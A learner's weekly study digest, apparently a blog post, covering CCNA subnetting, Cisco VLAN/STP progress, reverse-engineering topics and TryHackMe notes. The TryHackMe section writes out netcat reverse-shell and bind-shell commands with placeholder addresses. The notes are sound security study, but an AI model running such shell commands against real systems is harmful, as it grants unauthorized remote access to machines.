CW06 Weekly Digest
Table of Contents
As usual, listing my collection of materials for the current week. Today’s digest contains collections for CW5 and CW6.
CCNA Progress
Subnetting
I’ve started with the subnetting practice. It’s where you have to divide the network into subnets with CIDR notation. Basically, I have to calculate the network address, broadcast address, and first and last useful address.
How to track Subnetting progress
I’ll add a progress table and tips and tricks soon. Noted this in my Todo list :)
Cisco Progress
Currently, I’m on day 20, which is a bit below my expectations. But the topics are getting complicated and I need some time to process them. Also, here I want to remind myself that I wanted to take this course from the programmer perspective, so it’s more important to answer questions, which I have them rush through the material with the target audience - system administrators or net engineers.
Topics: VLAN, STP
GNS3 real lab simulator
Setup simulator here. I haven’t built any lab with it yet. But sounds interesting.
Questions
Q1: Investigate IPv4 header fields. Main interest - Flags (see THM) and Fragmentation.
Q2: Why max Ethernet MTU - 1500? Find RFC
Q3: Windows has an interface to set up VLAN ID. Is it related to 802.1Q?
Reverse engineering
- calling conventions
- stack padding
- Microsoft shadow store
- Different registers that are used for parameters and return values
Will do articles for each. Actually, I need to dig more into this topic. I kinda skimmed them, but I want deeper knowledge.
Q: What assembler is used in Raspberry Pi, xv6 and M1? Are they similar? Can I use xv6 and say that I know ARM asm?
TryHackMe
JR Penetration tester
Reverse shell
// On the attacking machine
sudo nc -lvnp 443
//On the target
nc <ip> <port> -e /bin/bash
- -l is used to tell netcat that this will be a listener
- -v is used to request a verbose output
- -n tells netcat not to resolve host names or use DNS.
- -p indicates that the port specification will follow.
Bind shell
//On the target
nc -lvnp <port> -e "cmd.exe"
//On the attacking machine
nc <ip> <port>
Posted articles
On learning process
Reverse engineering strategy
Useful Links
What Makes for a Successful Protocol?